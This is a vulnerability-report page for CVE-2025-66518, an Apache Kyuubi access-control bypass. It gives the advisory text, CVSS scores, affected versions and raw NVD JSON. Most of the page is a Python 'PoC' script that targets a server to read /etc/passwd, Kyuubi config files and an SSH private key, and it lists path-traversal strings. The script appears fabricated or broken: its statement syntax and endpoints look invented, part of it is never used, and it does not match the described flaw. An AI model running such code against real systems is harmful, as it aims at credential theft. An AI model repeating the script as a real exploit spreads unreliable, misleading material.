Security Vulnerability Report
CVE-2025-66518 CVSS 8.8 HIGH

Published: 2026-01-05 09:15:54
Last Modified: 2026-01-27 21:32:32

Description

Any client who can access Apache Kyuubi Server via Kyuubi frontend protocols can bypass the server-side config kyuubi.session.local.dir.allow.list and use local files that are not listed in the config. This issue affects Apache Kyuubi from 1.6.0 through 1.10.2. Users are recommended to upgrade to version 1.10.3 or later, which fixes the issue.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:apache:kyuubi:*:*:*:*:*:*:*:* - VULNERABLE
Apache Kyuubi 1.6.0
Apache Kyuubi 1.6.1
Apache Kyuubi 1.6.2
Apache Kyuubi 1.7.0
Apache Kyuubi 1.7.1
Apache Kyuubi 1.8.0
Apache Kyuubi 1.8.1
Apache Kyuubi 1.9.0
Apache Kyuubi 1.9.1
Apache Kyuubi 1.10.0
Apache Kyuubi 1.10.1
Apache Kyuubi 1.10.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66518 PoC - Apache Kyuubi Server Access Control Bypass
# Affected Version: Apache Kyuubi 1.6.0 - 1.10.2
# This PoC demonstrates bypassing kyuubi.session.local.dir.allow.list restriction

import requests
import json

TARGET_HOST = "http://target-kyuubi-server:10099"
SESSION_USER = "test_user"
SESSION_PASSWORD = "test_password"


def create_kyuubi_session():
    """Create a new Kyuubi session with frontend protocol"""
    session_config = {
        "conf": {
            "spark.master": "local[*]",
            "kyuubi.session.engine.initialize.startup.timeout": "600s"
        },
        "engineType": "spark",
        "fetchSchema": True,
        "user": SESSION_USER
    }
    response = requests.post(
        f"{TARGET_HOST}/api/kyuubi/session",
        json=session_config,
        headers={"Content-Type": "application/json"}
    )
    return response.json()


def bypass_allow_list(session_handle, file_path):
    """Bypass kyuubi.session.local.dir.allow.list to read arbitrary files

    This method exploits the path traversal vulnerability in Kyuubi frontend
    protocol to access files outside the allowed directory list.
    """
    # Method 1: Direct absolute path access
    exploit_request = {
        "sessionHandle": session_handle,
        "operationHandle": {
            "operationType": "EXECUTE_STATEMENT",
            "statement": f"LOAD TEXTFILE '{file_path}'",
            "runAsync": False,
            "queryTimeout": 300
        },
        "confOverlay": {}
    }
    # Method 2: Path traversal using relative paths
    # Example: '../../../etc/passwd' or '../../../opt/kyuubi/conf/secrets.conf'
    traversal_statement = f"LOAD TEXTFILE '{file_path}'"
    response = requests.post(
        f"{TARGET_HOST}/api/kyuubi/operation",
        json=exploit_request,
        headers={"Content-Type": "application/json"}
    )
    return response.json()


def main():
    """Main exploit function"""
    print("[*] CVE-2025-66518 Apache Kyuubi Access Control Bypass Exploit")
    print("[*] Target: " + TARGET_HOST)

    # Step 1: Create session
    print("\n[+] Step 1: Creating Kyuubi session...")
    session = create_kyuubi_session()
    session_handle = session.get("sessionHandle")
    if not session_handle:
        print("[-] Failed to create session")
        return
    print(f"[+] Session created: {session_handle}")

    # Step 2: Bypass allow list to read sensitive files
    target_files = [
        "/etc/passwd",
        "/opt/kyuubi/conf/kyuubi-defaults.conf",
        "/opt/kyuubi/conf/kyuubi-env.sh",
        "/home/kyuubi/.ssh/id_rsa"
    ]
    print("\n[+] Step 2: Attempting to bypass allow list restrictions...")
    for file_path in target_files:
        print(f"\n[*] Attempting to read: {file_path}")
        result = bypass_allow_list(session_handle, file_path)
        print(f"[*] Result: {json.dumps(result, indent=2)}")


if __name__ == "__main__":
    main()

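References

https://lists.apache.org/thread/xp460bwbyzdhho34ljd4nchyt2fmhodl (Mailing List)
http://www.openwall.com/lists/oss-security/2026/01/05/1 (Mailing List, Third Party Advisory)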

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66518", "sourceIdentifier": "[email protected]", "published": "2026-01-05T09:15:54.430", "lastModified": "2026-01-27T21:32:32.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Any client who can access to Apache Kyuubi Server via Kyuubi frontend protocols can bypass server-side config kyuubi.session.local.dir.allow.list and use local files which are not listed in the config.\n\nThis issue affects Apache Kyuubi: from 1.6.0 through 1.10.2.\n\nUsers are recommended to upgrade to version 1.10.3 or upper, which fixes the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:L/SC:H/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": 
"NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-27"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:kyuubi:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.6.0", "versionEndExcluding": "1.10.3", "matchCriteriaId": "D58033CE-D3EE-4FD3-A49C-620799B49E6D"}]}]}], "references": [{"url": "https://lists.apache.org/thread/xp460bwbyzdhho34ljd4nchyt2fmhodl", "source": "[email protected]", "tags": ["Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/05/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}